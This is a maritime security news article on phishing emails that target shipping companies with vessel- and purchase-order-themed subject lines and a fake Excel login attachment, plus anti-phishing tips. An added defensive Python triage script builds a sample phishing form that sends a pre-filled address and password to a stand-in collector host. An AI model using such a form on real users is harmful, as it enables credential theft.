Malicious emails against Shipping Companies continue

In their weekly list of malicious emails to shipping companies for the second week of April, maritime security firm Dryad Global and its cyber security partners, Red Sky Alliance, observed a large percentage of these emails attempting to deliver Windows trojan malware.

The partners perform weekly queries of backend databases, identifying all new data containing Motor Vessel (MV) and Motor Tanker (MT) in the subject line of malicious emails.

The identified emails attempted to deliver malware or phishing links to compromise the vessels and/or parent companies.

Users should be aware of the subject lines used and the email addresses that are attempting to deliver the messages.

Some of the new vessel names used this week included “MT Ocean Star” and “MV Phuong Dong 06”, among others.

In addition, this week, analysts observed a phishing email using the subject line of “PO#01391-04// EXP SHIPMENT// CARGO.”

Many of the most common phishing emails attackers use contain the phrase “PO” or “Purchase Order.” These emails often reach financial departments, which have access to sensitive company information.

The email contains a malicious .htm file attachment. When opened, the file shows a login window for “MicroSoft Excel.” The malware even auto-fills the username with the victim's email address.

When the user enters their correct credentials, the malware captures the input and sends it to the attacker.

Although the login looks suspicious, the fact that it only accepts the correct username/password input indicates that it’s linked to a legitimate MS Office login portal.

These analysis results illustrate how a recipient could be fooled into opening an infected email.
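The traits described above (an MV/MT or PO subject line, an .htm attachment, a password prompt with the recipient's address already filled in) can be checked mechanically before a message reaches a user. The following is an added example, not code from the article, Dryad Global or Red Sky Alliance; the addresses, attachment name and markup are constructed, and the check for a form posting to a remote URL is an assumption about how the captured input is sent.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage
from email.utils import parseaddr
from html.parser import HTMLParser

# Subject lures named in the article: vessel prefixes MV/MT and "PO"/"Purchase Order".
SUBJECT_LURE = re.compile(r"\bM[VT]\s+\w+|\bPO\b|purchase\s+order", re.I)

class FormScan(HTMLParser):
    def __init__(self, recipient):
        super().__init__()
        self.recipient, self.findings = recipient.lower(), set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip().lower() for k, v in attrs}
        if tag == "input" and a.get("type") == "password":
            self.findings.add("password field")
        if tag == "input" and self.recipient and a.get("value") == self.recipient:
            self.findings.add("recipient address pre-filled")
        if tag == "form" and a.get("action", "").startswith(("http://", "https://")):
            self.findings.add("form posts to remote URL")  # assumed delivery path

def triage(raw_eml):
    """Return sorted findings for one raw RFC 5322 message."""
    msg = message_from_string(raw_eml, policy=policy.default)
    findings = set()
    if SUBJECT_LURE.search(str(msg["Subject"] or "")):
        findings.add("vessel/PO subject lure")
    recipient = parseaddr(str(msg["To"] or ""))[1]
    for part in msg.iter_attachments():
        if (part.get_filename() or "").lower().endswith((".htm", ".html")):
            findings.add("HTML attachment")
            body = part.get_content()  # str for text/*, bytes otherwise
            scan = FormScan(recipient)
            scan.feed(body if isinstance(body, str) else body.decode("utf-8", "replace"))
            findings |= scan.findings
    return sorted(findings)

def build_sample(subject, with_attachment=True):
    """Constructed test message; addresses, file name and markup are made up."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "accounts@sender.example", "clerk@shipping.example", subject
    m.set_content("Please see the attached order.")
    if with_attachment:
        m.add_attachment('<form action="https://collector.example/x"><input name="u" '
                         'value="clerk@shipping.example"><input type="password" name="p"></form>',
                         subtype="html", filename="order.htm")
    return m.as_string()
```

Calling `triage(build_sample("PO#01391-04// EXP SHIPMENT// CARGO"))` returns all five findings; a message with several of them together is a candidate for quarantine rather than delivery.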

Cyber threat and COVID-19 scammers

Meanwhile, COVID-19 seems to be providing a fruitful field for cyber attacks. Recent reports say scammers are taking advantage of the fear and doubt created by the pandemic, attacking those who are looking for protection.

Therefore, ICC's Cyber Threat Intelligence (CTI) team provided tips for cyber resilience amid the COVID-19 situation.

Recommendations

Preventative cyber protection offers a strong first-line defense, but malicious hackers are developing new techniques to evade current detection daily.

To address this residual risk, software-based protection should be treated as one constituent of a wider strategy that also encompasses the human-element as well as organizational workflows and procedures, Dryad notes.

As such, Dryad advises companies to:

  • Train all levels of the marine supply chain to realize they are under constant cyber-attack.
  • Stress maintaining constant attention to real-world cyber consequences of careless cyber practices or general inattentiveness.
  • Provide practical guidance on how to look for a potential phishing attempt.
  • Use direct communication to verify emails and supply chain email communication.

SAFETY4SEA has earlier provided 5 tips to identify a phishing e-mail:

  1. Check the display name: Just because an e-mail appears to come from a name you know, it does not mean that this is the case. Always look at the email address, not just the sender.
  2. Is the e-mail asking for personal information? Legitimate companies are unlikely to ask for personal information in an e-mail, at least without informing you first in some other way and validating that the information will be secured. Don’t give up personal information unless you are absolutely certain whom that information goes to.
  3. Has the e-mail an urgent tone? By creating a climate of emergency, the potential hacker aims to create panic so that the recipient won’t have much time to think and will act recklessly. Beware of urgent or threatening language, particularly in the subject line.
  4. Is the e-mail properly signed? It is a key feature of legitimate e-mails that senders include a full signature block at the bottom, while businesses always provide contact details.
  5. Is the e-mail grammatically correct? Potential attackers are often less concerned about spelling or grammatical consistency than a normal sender would be.

 https://safety4sea.com/malicious-emails-against-shipping-companies-continue/